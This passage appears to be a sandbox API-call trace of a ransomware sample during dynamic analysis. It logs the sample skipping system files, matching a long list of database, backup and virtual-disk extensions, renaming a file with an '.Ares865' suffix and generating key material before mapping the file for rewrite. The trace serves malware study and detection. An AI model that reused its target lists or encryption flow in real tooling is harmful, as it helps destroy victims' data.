[0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2="temp") returned -1 [0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2="pagefile.sys") returned 1 [0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2="boot") returned 1 [0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2="ids.txt") returned 1 [0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2="ntuser.dat") returned 1 [0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2="perflogs") returned 1 [0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2="MSBuild") returned 1 [0089.202] lstrlenW (lpString="print_pref.ico") returned 14 [0089.202] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 96 [0089.202] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="print_pref.ico" | out: lpString1="print_pref.ico") returned="print_pref.ico" [0089.202] lstrlenW (lpString="print_pref.ico") returned 14 [0089.202] lstrlenW (lpString="Ares865") returned 7 [0089.202] lstrcmpiW (lpString1="ref.ico", lpString2="Ares865") returned 1 [0089.202] lstrlenW (lpString=".dll") returned 4 [0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2=".dll") returned 1 [0089.202] lstrlenW (lpString=".lnk") returned 4 [0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2=".lnk") returned 1 [0089.202] lstrlenW (lpString=".ini") returned 4 [0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2=".ini") returned 1 [0089.202] lstrlenW (lpString=".sys") returned 4 [0089.202] lstrcmpiW (lpString1="print_pref.ico", lpString2=".sys") returned 1 [0089.202] lstrlenW (lpString="print_pref.ico") returned 14 [0089.202] lstrlenW (lpString="bak") returned 3 [0089.202] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.202] lstrlenW (lpString="ba_") returned 3 [0089.202] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.202] lstrlenW (lpString="dbb") returned 3 [0089.202] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.202] lstrlenW (lpString="vmdk") returned 4 [0089.202] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.202] lstrlenW (lpString="rar") returned 3 [0089.202] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.202] lstrlenW (lpString="zip") returned 3 [0089.202] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.202] lstrlenW (lpString="tgz") returned 3 [0089.202] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.202] lstrlenW (lpString="vbox") returned 4 [0089.203] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.203] lstrlenW (lpString="vdi") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.203] lstrlenW (lpString="vhd") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.203] lstrlenW (lpString="vhdx") returned 4 [0089.203] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.203] lstrlenW (lpString="avhd") returned 4 [0089.203] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.203] lstrlenW (lpString="db") returned 2 [0089.203] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.203] lstrlenW (lpString="db2") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.203] lstrlenW (lpString="db3") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.203] lstrlenW (lpString="dbf") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.203] lstrlenW (lpString="mdf") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.203] lstrlenW (lpString="mdb") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.203] lstrlenW (lpString="sql") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.203] lstrlenW (lpString="sqlite") returned 6 [0089.203] lstrcmpiW (lpString1="ef.ico", lpString2="sqlite") returned -1 [0089.203] lstrlenW (lpString="sqlite3") returned 7 [0089.203] lstrcmpiW (lpString1="ref.ico", lpString2="sqlite3") returned -1 [0089.203] lstrlenW (lpString="sqlitedb") returned 8 [0089.203] lstrcmpiW (lpString1="pref.ico", lpString2="sqlitedb") returned -1 [0089.203] lstrlenW (lpString="xml") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.203] lstrlenW (lpString="$er") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.203] lstrlenW (lpString="4dd") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.203] lstrlenW (lpString="4dl") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.203] lstrlenW (lpString="^^^") returned 3 [0089.203] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.204] lstrlenW (lpString="abs") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.204] lstrlenW (lpString="abx") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.204] lstrlenW (lpString="accdb") returned 5 [0089.204] lstrcmpiW (lpString1="f.ico", lpString2="accdb") returned 1 [0089.204] lstrlenW (lpString="accdc") returned 5 [0089.204] lstrcmpiW (lpString1="f.ico", lpString2="accdc") returned 1 [0089.204] lstrlenW (lpString="accde") returned 5 [0089.204] lstrcmpiW (lpString1="f.ico", lpString2="accde") returned 1 [0089.204] lstrlenW (lpString="accdr") returned 5 [0089.204] lstrcmpiW (lpString1="f.ico", lpString2="accdr") returned 1 [0089.204] lstrlenW (lpString="accdt") returned 5 [0089.204] lstrcmpiW (lpString1="f.ico", lpString2="accdt") returned 1 [0089.204] lstrlenW (lpString="accdw") returned 5 [0089.204] lstrcmpiW (lpString1="f.ico", lpString2="accdw") returned 1 [0089.204] lstrlenW (lpString="accft") returned 5 [0089.204] lstrcmpiW (lpString1="f.ico", lpString2="accft") returned 1 [0089.204] lstrlenW (lpString="adb") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.204] lstrlenW (lpString="adb") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.204] lstrlenW (lpString="ade") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.204] lstrlenW (lpString="adf") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.204] lstrlenW (lpString="adn") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.204] lstrlenW (lpString="adp") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.204] lstrlenW (lpString="alf") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.204] lstrlenW (lpString="ask") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.204] lstrlenW (lpString="btr") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.204] lstrlenW (lpString="cat") returned 3 [0089.204] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.204] lstrlenW (lpString="cdb") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.205] lstrlenW (lpString="ckp") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.205] lstrlenW (lpString="cma") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.205] lstrlenW (lpString="cpd") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.205] lstrlenW (lpString="dacpac") returned 6 [0089.205] lstrcmpiW (lpString1="ef.ico", lpString2="dacpac") returned 1 [0089.205] lstrlenW (lpString="dad") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.205] lstrlenW (lpString="dadiagrams") returned 10 [0089.205] lstrcmpiW (lpString1="t_pref.ico", lpString2="dadiagrams") returned 1 [0089.205] lstrlenW (lpString="daschema") returned 8 [0089.205] lstrcmpiW (lpString1="pref.ico", lpString2="daschema") returned 1 [0089.205] lstrlenW (lpString="db-journal") returned 10 [0089.205] lstrcmpiW (lpString1="t_pref.ico", lpString2="db-journal") returned 1 [0089.205] lstrlenW (lpString="db-shm") returned 6 [0089.205] lstrcmpiW (lpString1="ef.ico", lpString2="db-shm") returned 1 [0089.205] lstrlenW (lpString="db-wal") returned 6 [0089.205] lstrcmpiW (lpString1="ef.ico", lpString2="db-wal") returned 1 [0089.205] lstrlenW (lpString="dbc") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.205] lstrlenW (lpString="dbs") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.205] lstrlenW (lpString="dbt") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.205] lstrlenW (lpString="dbv") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.205] lstrlenW (lpString="dbx") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.205] lstrlenW (lpString="dcb") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.205] lstrlenW (lpString="dct") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.205] lstrlenW (lpString="dcx") returned 3 [0089.205] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.205] lstrlenW (lpString="ddl") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.206] lstrlenW (lpString="dlis") returned 4 [0089.206] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.206] lstrlenW (lpString="dp1") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.206] lstrlenW (lpString="dqy") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.206] lstrlenW (lpString="dsk") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.206] lstrlenW (lpString="dsn") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.206] lstrlenW (lpString="dtsx") returned 4 [0089.206] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.206] lstrlenW (lpString="dxl") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.206] lstrlenW (lpString="eco") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.206] lstrlenW (lpString="ecx") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.206] lstrlenW (lpString="edb") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.206] lstrlenW (lpString="epim") returned 4 [0089.206] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.206] lstrlenW (lpString="fcd") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.206] lstrlenW (lpString="fdb") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.206] lstrlenW (lpString="fic") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.206] lstrlenW (lpString="flexolibrary") returned 12 [0089.206] lstrcmpiW (lpString1="int_pref.ico", lpString2="flexolibrary") returned 1 [0089.206] lstrlenW (lpString="fm5") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.206] lstrlenW (lpString="fmp") returned 3 [0089.206] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.206] lstrlenW (lpString="fmp12") returned 5 [0089.206] lstrcmpiW (lpString1="f.ico", lpString2="fmp12") returned -1 [0089.207] lstrlenW (lpString="fmpsl") returned 5 [0089.207] lstrcmpiW (lpString1="f.ico", lpString2="fmpsl") returned -1 [0089.207] lstrlenW (lpString="fol") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.207] lstrlenW (lpString="fp3") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.207] lstrlenW (lpString="fp4") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.207] lstrlenW (lpString="fp5") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.207] lstrlenW (lpString="fp7") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.207] lstrlenW (lpString="fpt") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.207] lstrlenW (lpString="frm") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.207] lstrlenW (lpString="gdb") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.207] lstrlenW (lpString="gdb") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.207] lstrlenW (lpString="grdb") returned 4 [0089.207] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.207] lstrlenW (lpString="gwi") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.207] lstrlenW (lpString="hdb") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.207] lstrlenW (lpString="his") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.207] lstrlenW (lpString="ib") returned 2 [0089.207] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.207] lstrlenW (lpString="idb") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.207] lstrlenW (lpString="ihx") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.207] lstrlenW (lpString="itdb") returned 4 [0089.207] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.207] lstrlenW (lpString="itw") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.207] lstrlenW (lpString="jet") returned 3 [0089.207] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.208] lstrlenW (lpString="jtx") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.208] lstrlenW (lpString="kdb") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.208] lstrlenW (lpString="kexi") returned 4 [0089.208] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.208] lstrlenW (lpString="kexic") returned 5 [0089.208] lstrcmpiW (lpString1="f.ico", lpString2="kexic") returned -1 [0089.208] lstrlenW (lpString="kexis") returned 5 [0089.208] lstrcmpiW (lpString1="f.ico", lpString2="kexis") returned -1 [0089.208] lstrlenW (lpString="lgc") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.208] lstrlenW (lpString="lwx") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.208] lstrlenW (lpString="maf") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.208] lstrlenW (lpString="maq") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.208] lstrlenW (lpString="mar") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.208] lstrlenW (lpString="marshal") returned 7 [0089.208] lstrcmpiW (lpString1="ref.ico", lpString2="marshal") returned 1 [0089.208] lstrlenW (lpString="mas") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.208] lstrlenW (lpString="mav") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.208] lstrlenW (lpString="maw") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.208] lstrlenW (lpString="mdbhtml") returned 7 [0089.208] lstrcmpiW (lpString1="ref.ico", lpString2="mdbhtml") returned 1 [0089.208] lstrlenW (lpString="mdn") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.208] lstrlenW (lpString="mdt") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.208] lstrlenW (lpString="mfd") returned 3 [0089.208] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.208] lstrlenW (lpString="mpd") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.209] lstrlenW (lpString="mrg") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.209] lstrlenW (lpString="mud") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.209] lstrlenW (lpString="mwb") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.209] lstrlenW (lpString="myd") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.209] lstrlenW (lpString="ndf") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.209] lstrlenW (lpString="nnt") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.209] lstrlenW (lpString="nrmlib") returned 6 [0089.209] lstrcmpiW (lpString1="ef.ico", lpString2="nrmlib") returned -1 [0089.209] lstrlenW (lpString="ns2") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.209] lstrlenW (lpString="ns3") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.209] lstrlenW (lpString="ns4") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.209] lstrlenW (lpString="nsf") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.209] lstrlenW (lpString="nv") returned 2 [0089.209] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.209] lstrlenW (lpString="nv2") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.209] lstrlenW (lpString="nwdb") returned 4 [0089.209] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.209] lstrlenW (lpString="nyf") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.209] lstrlenW (lpString="odb") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.209] lstrlenW (lpString="odb") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.209] lstrlenW (lpString="oqy") returned 3 [0089.209] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.210] lstrlenW (lpString="ora") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.210] lstrlenW (lpString="orx") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.210] lstrlenW (lpString="owc") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.210] lstrlenW (lpString="p96") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.210] lstrlenW (lpString="p97") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.210] lstrlenW (lpString="pan") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.210] lstrlenW (lpString="pdb") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.210] lstrlenW (lpString="pdm") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.210] lstrlenW (lpString="pnz") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.210] lstrlenW (lpString="qry") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.210] lstrlenW (lpString="qvd") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.210] lstrlenW (lpString="rbf") returned 3 [0089.210] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.210] lstrlenW (lpString="rctd") returned 4 [0089.210] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.210] lstrlenW (lpString="rod") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.211] lstrlenW (lpString="rodx") returned 4 [0089.211] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.211] lstrlenW (lpString="rpd") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.211] lstrlenW (lpString="rsd") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.211] lstrlenW (lpString="sas7bdat") returned 8 [0089.211] lstrcmpiW (lpString1="pref.ico", lpString2="sas7bdat") returned -1 [0089.211] lstrlenW (lpString="sbf") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.211] lstrlenW (lpString="scx") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.211] lstrlenW (lpString="sdb") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.211] lstrlenW (lpString="sdc") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.211] lstrlenW (lpString="sdf") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.211] lstrlenW (lpString="sis") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.211] lstrlenW (lpString="spq") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.211] lstrlenW (lpString="te") returned 2 [0089.211] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.211] lstrlenW (lpString="teacher") returned 7 [0089.211] lstrcmpiW (lpString1="ref.ico", lpString2="teacher") returned -1 [0089.211] lstrlenW (lpString="tmd") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.211] lstrlenW (lpString="tps") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.211] lstrlenW (lpString="trc") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.211] lstrlenW (lpString="trc") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.211] lstrlenW (lpString="trm") returned 3 [0089.211] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.212] lstrlenW (lpString="udb") returned 3 [0089.212] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.212] lstrlenW (lpString="udl") returned 3 [0089.212] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.212] lstrlenW (lpString="usr") returned 3 [0089.212] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.212] lstrlenW (lpString="v12") returned 3 [0089.212] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.212] lstrlenW (lpString="vis") returned 3 [0089.212] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.212] lstrlenW (lpString="vpd") returned 3 [0089.212] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.212] lstrlenW (lpString="vvv") returned 3 [0089.212] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.212] lstrlenW (lpString="wdb") returned 3 [0089.212] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.212] lstrlenW (lpString="wmdb") returned 4 [0089.212] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.212] lstrlenW (lpString="wrk") returned 3 [0089.212] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.212] lstrlenW (lpString="xdb") returned 3 [0089.212] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.212] lstrlenW (lpString="xld") returned 3 [0089.212] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.212] lstrlenW (lpString="xmlff") returned 5 [0089.212] lstrcmpiW (lpString1="f.ico", lpString2="xmlff") returned -1 [0089.212] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.Ares865") returned 108 [0089.212] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.ares865"), dwFlags=0x1) returned 1 [0089.213] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.214] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=58312) returned 1 [0089.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.214] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.215] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.215] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.215] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe6d0, lpName=0x0) returned 0x15c [0089.216] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe6d0) returned 0x190000 [0089.220] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.220] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.220] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.220] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.220] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.221] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.221] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.221] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.221] CloseHandle (hObject=0x15c) returned 1 [0089.222] CloseHandle (hObject=0x118) returned 1 [0089.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 